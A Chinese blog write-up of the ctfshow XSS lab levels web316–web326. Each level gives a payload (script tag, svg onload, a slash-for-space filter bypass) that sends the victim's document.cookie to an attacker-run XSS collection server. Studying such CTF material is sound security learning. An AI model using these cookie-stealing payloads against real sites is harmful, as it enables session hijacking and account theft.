前言
欢迎来到我的博客
个人主页:北岭敲键盘的荒漠猫-CSDN博客
本文整理ctfshow中的xss部分靶场通关攻略
web316
打开靶场一个对话框
经测试有xss漏洞,而且没啥过滤。
考虑xss盗取cookie的操作。
建议在服务器上搭建蓝莲花xss平台
payload:
<script>window.location.href='http://服务器蓝莲花地址/index.php?c='+document.cookie</scrip>
然后靶场后台就会有机器人访问,我们就能收到cookie,而flag就在cookie中。
需要刷新平台页面才能看到收到的消息。
拿去提交完美~
web317
打开页面还是一模一样
测试这个输入框发现,这个输入框是不能输入script的。
那么我们就无法使用<script>标签了。
这里就利用其他的标签来解决即可。
这里使用<img>标签失败,可以触发但是拿不到cookie,因为是机器人操作可能有误差img无法获取。
所以
payload:
<svg οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>
然后就获取cookie里的flag了。
web318
打开界面
好家伙依旧是一个界面
然后。。。不知道这题咋样,反正上一题的那个payload没问题直接出结果。
web319
打开题目依旧是相同的页面
嘶也没咋测试还是上一个payload给处理了。。。
web320
打开跟上面界面一模一样
这关有说法上关那个payload就无法执行了。
先分析一下他都禁用了些什么。
对上面那个payload一顿测试,发现他没有过滤其他的词,仅仅过滤了空格。
那么我们的思路就变成为
使用无空格的标签
使用符号代替空格
在前端可以使用/来代替空格所以只需要略微改一下payload即可。
payload:
<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>
成功获取cookie以及flag
web321
打开界面
还是老样。
然后上一个payload放进去看看。
<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>
行又给秒了。
下一题。
web322
打开页面还是一模一样懒得截图了。
还是一样的操作,上上把的payload放上瞅一眼。
<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>
啧,唉真没挑战性,丫的又给秒了。。。。
下一题下一题
web323
界面还是如出一辙
测测上上上上次的payload
<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>
行了,又给秒了。
一招鲜吃遍天了。
(所以他到底过滤了啥。。。)
web324
打开不看也是一模一样
依旧是相同的payload来一波
<svg/οnlοad=window.location.href='http://蓝莲花地址/index.php?c='+document.cookie;>
依然给他秒了。。。。
web325
一样的payload一样的通关。
不想多吐槽了。
web326
一样秒
不吐槽
嗯很好,
原来开局用一个payload就能打通11关,嗯不错不错。。。。
我靠我的钱。